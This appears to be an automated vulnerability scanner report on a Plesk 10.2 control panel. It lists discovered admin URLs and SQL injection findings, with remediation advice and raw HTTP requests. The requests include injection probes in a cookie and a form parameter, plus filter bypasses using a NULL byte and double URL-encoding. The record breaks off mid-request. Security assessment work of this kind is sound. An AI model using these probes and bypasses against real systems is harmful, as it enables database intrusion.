12.79. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/create

12.80. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/create-addon

12.81. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/delete/

12.82. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/edit/

12.83. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/edit/id/

12.84. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/list

12.85. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/list-data

12.86. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/

12.87. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/activate/

12.88. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/change-subscription/

12.89. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/change-subscription/id/

12.90. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/change-subscription/id/4

12.91. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/create

12.92. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/delete-current/

12.93. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/delete-current/id/

12.94. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/delete-current/id/4

12.95. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/delete/

12.96. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/list

12.97. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/list-data

12.98. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/list/

12.99. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login-info/

12.100. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login-info/id/

12.101. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login-info/id/4

12.102. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login/

12.103. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login/id/

12.104. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/login/id/4

12.105. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/new-subscription/

12.106. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/new-subscription/id/

12.107. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/new-subscription/id/4

12.108. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/overview/

12.109. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/overview/id/

12.110. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/overview/id/4

12.111. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/personal-info/

12.112. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/personal-info/id/

12.113. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/personal-info/id/4

12.114. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/subscriptions-list-data/

12.115. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/subscriptions-list-data/id/

12.116. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/subscriptions-list-data/id/4

12.117. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/suspend/

12.118. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/toggle/

12.119. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/toggle/id/

12.120. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer/toggle/id/4

12.121. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/domain/

12.122. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/domain/list

12.123. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/domain/list-data

12.124. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/email-address/

12.125. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/email-address/configuration/

12.126. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/email-address/configuration/id/

12.127. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/

12.128. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/chart-image/

12.129. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/parameters/

12.130. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/parameters/group/

12.131. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/parameters/group/Services

12.132. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/restore-defaults

12.133. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/server-status/

12.134. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/health/thresholds-hint/

12.135. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/img/

12.136. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/img/icons/

12.137. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/img/icons/small/

12.138. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/img/icons/small/subscription-status-

12.139. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/

12.140. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3

12.141. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3

12.142. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/overview/

12.143. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/overview/id/

12.144. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/

12.145. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/

12.146. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-panel=home.admin/

12.147. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-panel=home.reseller/

12.148. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/

12.149. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin/

12.150. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin/report

12.151. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@2/

12.152. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@2/domain@1/

12.153. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@2/domain@1/hosting/

12.154. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@2/domain@1/hosting/file-manager/

12.155. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain-summary-report/

12.156. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain@any/traffic/

12.157. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/ipaddress@/

12.158. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/logo/

12.159. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/

12.160. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@5/domain@any/traffic/

12.161. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/modules/

12.162. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/

12.163. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/

12.164. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/

12.165. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/

12.166. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/properties/

12.167. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/manage-domain/

12.168. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences

12.169. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/register-domain/

12.170. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/

12.171. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@/

12.172. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@1/

12.173. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@1/auto@/

12.174. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@1/properties/

12.175. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/

12.176. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/

12.177. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/properties/

12.178. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/sessions/

12.179. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/server/

12.180. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/server/reboot/

12.181. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/server/shutdown/

12.182. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller-self/

12.183. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller-self/oversell-policy/

12.184. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller-self/subscription-overview

12.185. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/

12.186. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/activate/

12.187. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/create

12.188. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/delete/

12.189. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/list-data

12.190. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/overview/

12.191. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/overview/id/

12.192. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/reseller/suspend/

12.193. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/robots.txt

12.194. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/role/

12.195. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/role/create/

12.196. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/role/list/

12.197. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/sbin/

12.198. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/sbin/nologin

12.199. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/server/

12.200. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/server/featured-applications

12.201. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/

12.202. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/

12.203. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/

12.204. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/

12.205. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/

12.206. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/

12.207. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/img/

12.208. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/img/icons/

12.209. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/img/icons/big/

12.210. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/img/icons/small/

12.211. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/

12.212. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/

12.213. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/

12.214. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/

12.215. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/

12.216. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/icons/

12.217. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/icons/tabs/

12.218. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/images/

12.219. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/

12.220. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/

12.221. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription

12.222. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/power-mode-logout

12.223. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home

12.224. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/

12.225. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/disable-featured-applications-promo

12.226. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/installed-applications/

12.227. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/auth/

12.228. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/auth/logout

12.229. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/

12.230. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/

12.231. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/

12.232. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/account/

12.233. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/account/action-name/

12.234. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/account/action-name/create-subscription

12.235. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/admin-home/

12.236. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/admin-home/action-name/

12.237. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/admin-home/action-name/index

12.238. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/my-profile/

12.239. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/my-profile/action-name/

12.240. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/my-profile/action-name/index

12.241. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/subscription/

12.242. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/subscription/action-name/

12.243. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/subscription/action-name/logout

12.244. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/my-profile

12.245. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/scripts/

12.246. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/user/

12.247. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/user/list/

12.248. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/statistics/

12.249. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/

12.250. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/activate/

12.251. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/change

12.252. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/create

12.253. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/delete/

12.254. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/list

12.255. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/list-data

12.256. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/list/

12.257. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/overview/

12.258. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/overview/id/

12.259. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/stats-hint/

12.260. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/stats-hint/domainId/

12.261. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/subscription/suspend/

12.262. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/user/

12.263. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/user/create/

12.264. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/user/list/

12.265. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/

12.266. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/local/

12.267. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/local/psa/

12.268. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/local/psa/bin/

12.269. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/usr/local/psa/bin/chrootsh

13. Content type incorrectly stated

13.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/

13.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/chk.js.php

13.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/disable-featured-applications-promo



1. SQL injection  next
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/ [locale cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/

Issue detail

The locale cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the locale cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /admin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Cookie: PHPSESSID=4f8553936d19c08a70c076cf2b95f490; locale=en-US%00'; psaContext=health

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:04:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:04:20 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=home; path=/
Content-type: text/html
Date: Fri, 23 Sep 2011 19:04:20 GMT
Server: sw-cp-server
Content-Length: 16237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<script type="text/javascript">
Jsw.baseUrl = '/admin';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>
...[SNIP]...

Request 2

GET /admin/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Cookie: PHPSESSID=4f8553936d19c08a70c076cf2b95f490; locale=en-US%00''; psaContext=health

Response 2

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:04:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:04:31 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:04:31 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

1.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create [contactInfoSection%5BcontactInfo%5D%5Bfax%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/create

Issue detail

The contactInfoSection%5BcontactInfo%5D%5Bfax%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the contactInfoSection%5BcontactInfo%5D%5Bfax%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the contactInfoSection%5BcontactInfo%5D%5Bfax%5D request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /admin/customer/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create
Content-Length: 1324
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Pragma: no-cache
Cache-Control: no-cache

